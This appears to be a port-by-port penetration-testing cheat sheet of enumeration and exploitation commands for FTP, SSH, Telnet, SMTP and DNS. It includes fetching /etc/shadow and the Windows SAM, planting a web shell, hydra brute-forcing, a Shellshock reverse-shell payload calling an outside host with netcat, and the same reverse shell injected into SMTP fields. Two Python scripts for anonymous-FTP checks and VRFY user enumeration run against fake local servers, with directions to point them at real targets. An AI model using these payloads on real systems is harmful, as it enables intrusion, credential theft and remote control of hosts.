Content is added constantly, depending on free time :)
Instead of writing a list of tasks to perform on each port/service, or relying on old tools, I will write out the full command with its arguments to enumerate and (possibly) exploit each service with the newest tools.
$ip refers to a shell variable set with export ip=10.10.10.10 (replace 10.10.10.10 with the target address).
Remember to switch wordlists if one doesn't produce results.
Any port/service
Enumeration
- Banner:
nc -vn $ip [PORT]
- Search for public exploits for the service and version the banner reveals:
searchsploit [SERVICE NAME] [VERSION]
- Reuse credentials found on other local services
Port 21 - FTP
Enumeration
- Anonymous login:
nmap --script ftp-anon -p21 $ip
Exploitation
- Connect and try to download/upload files (even if you can't cd into that directory):
get /etc/shadow
get C:\Windows\System32\config\SAM
put shell.aspx
(uploading a web shell is useful when the FTP root is also served by IIS; then browse to it)
- Brute-force (-t 1 keeps a single connection at a time, to avoid tripping connection limits or lockouts):
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip ftp -t 1
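As an added example (not code from the original page) of what the banner grab and the ftp-anon check above do under the hood, the following Python script starts a constructed fake FTP daemon on a localhost port and checks it the way ftp-anon would: record the 220 banner, try the anonymous account, and distinguish 230 (accepted) from 530 (refused). The banner text, the fake daemon's behaviour and the root/toor credentials are invented for the demo.

```python
import ftplib
import socketserver
import threading

# Constructed fake FTP daemon for the demo: accepts only the anonymous account.
# The banner string is made up and only illustrates what a real server leaks.
FAKE_BANNER = b"220 (vsFTPd 3.0.3)\r\n"


class FakeFTPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        self.wfile.write(FAKE_BANNER)          # what `nc -vn $ip 21` would print
        user = None
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("ascii", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"331 Please specify the password.\r\n")
            elif cmd == "PASS":
                if user == "anonymous":
                    self.wfile.write(b"230 Login successful.\r\n")
                else:
                    self.wfile.write(b"530 Login incorrect.\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            else:
                self.wfile.write(b"500 Unknown command.\r\n")


def start_fake_ftp():
    """Bind the fake daemon to an ephemeral localhost port and serve it in the background."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeFTPHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def ftp_login_check(host, port, user="anonymous", passwd="anonymous@", timeout=5.0):
    """Return (banner, accepted): the 220 greeting and whether USER/PASS got a 2xx reply.

    ftplib raises error_perm on a 5xx reply (530 = bad credentials), which is the
    same signal ftp-anon keys on.
    """
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    banner = ftp.getwelcome()
    try:
        ftp.login(user, passwd)
        accepted = True
    except ftplib.error_perm:
        accepted = False
    finally:
        try:
            ftp.quit()
        except ftplib.all_errors:
            ftp.close()
    return banner, accepted


def run_demo():
    """Run the anonymous and a non-anonymous login against the constructed daemon."""
    server = start_fake_ftp()
    host, port = server.server_address
    try:
        banner, anon = ftp_login_check(host, port)
        _, root = ftp_login_check(host, port, "root", "toor")   # invented creds
    finally:
        server.shutdown()
        server.server_close()
    return {"banner": banner, "anonymous": anon, "root_toor": root}


if __name__ == "__main__":
    print(run_demo())
```

Against a real target, call ftp_login_check($ip, 21) directly; a 230 for anonymous means the get/put attempts above are worth trying.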
Port 22 - SSH
Enumeration
- Banner (the SSH version string identifies the server software):
nc -vn $ip 22
Exploitation
- Reuse private keys found on other machines (backups, web roots, FTP shares)
- Shellshock (bash CVE-2014-6271 via a ForceCommand-restricted account; you still need a valid key or password, and nc must support -e):
ssh root@$ip '() { :;}; nc 1.1.1.1 80 -e /bin/bash'
- Brute-force (hydra itself recommends -t 4 for SSH, since most servers limit parallel logins):
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip ssh -t 4
Port 23 - Telnet
Exploitation
- Brute-force:
hydra -l root -P /usr/share/wordlists/rockyou.txt $ip telnet -t 1
Port 25 - SMTP
Enumeration
- Enumerate users (VRFY; if it is disabled or answers 252 to everything, retry with -M EXPN or -M RCPT):
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t $ip
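As an added example (not from the original page, and not smtp-user-enum's own code) of the VRFY exchange the tool above drives, this Python script runs a constructed fake MTA on localhost and enumerates it: each candidate is sent in a VRFY, 250 counts as confirmed, 252 as ambiguous and 550 as unknown. It also sends a made-up canary user first, so that a server which answers 2xx to every name (or 502 because VRFY is disabled) is flagged as unusable instead of yielding false positives. The host name, user list and canary prefix are invented for the demo.

```python
import smtplib
import socketserver
import threading
import uuid

# Constructed user database for the fake MTA; only these names answer 250 to VRFY.
FAKE_USERS = {"root", "postmaster", "alice"}


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Minimal fake MTA: just enough of RFC 5321 for EHLO/VRFY/QUIT."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("ascii", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd in ("EHLO", "HELO"):
                self.wfile.write(b"250 mail.example.test\r\n")
            elif cmd == "VRFY":
                user = arg.strip().strip("<>").split("@")[0]
                if user in FAKE_USERS:
                    self.wfile.write(f"250 2.1.5 <{user}@example.test>\r\n".encode())
                else:
                    self.wfile.write(b"550 5.1.1 User unknown\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Command not implemented\r\n")


def start_fake_smtp():
    """Bind the fake MTA to an ephemeral localhost port and serve it in the background."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def smtp_vrfy_enum(host, port, candidates, timeout=5.0):
    """VRFY each candidate and classify the reply.

    Returns (confirmed, ambiguous, usable): 250 => confirmed, 252 => the server
    will accept mail but won't confirm the mailbox, 550/551 => unknown. A canary
    that cannot exist is tried first; if the server says 2xx to it, VRFY does not
    discriminate, and if it says 502 VRFY is disabled, so usable is False.
    """
    confirmed, ambiguous = [], []
    canary = "nx-" + uuid.uuid4().hex[:12]     # invented, guaranteed-unknown name
    with smtplib.SMTP(host, port, local_hostname="scanner.test", timeout=timeout) as smtp:
        smtp.ehlo()
        code, _ = smtp.verify(canary)
        if code == 502 or 200 <= code < 300:
            return [], [], False                # fall back to EXPN or RCPT TO
        for user in candidates:
            code, _ = smtp.verify(user)
            if code == 250:
                confirmed.append(user)
            elif code == 252:
                ambiguous.append(user)
    return confirmed, ambiguous, True


def run_demo():
    """Enumerate a constructed candidate list against the fake MTA."""
    server = start_fake_smtp()
    host, port = server.server_address
    try:
        return smtp_vrfy_enum(host, port, ["root", "bob", "alice", "www-data"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against a real target, call smtp_vrfy_enum($ip, 25, users) with the unix_users.txt list; when usable comes back False, switch to the EXPN or RCPT method as noted above.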
Exploitation
- Send mail with malicious parameters (a reverse-shell payload in every envelope field and header, to catch a server or filter that passes them to a shell; start a listener on 1.1.1.1:80 first, and terminate DATA with a lone "."):
ehlo server.com
mail from: 'nc 1.1.1.1 80 -e /bin/bash'
rcpt to: 'nc 1.1.1.1 80 -e /bin/bash'
data
Subject: nc 1.1.1.1 80 -e /bin/bash
.
Port 53 - DNS
Enumeration
- Zone transfer (replace server.com with the target's domain, learned from other services or a reverse lookup):
dig @$ip server.com axfr +nocookie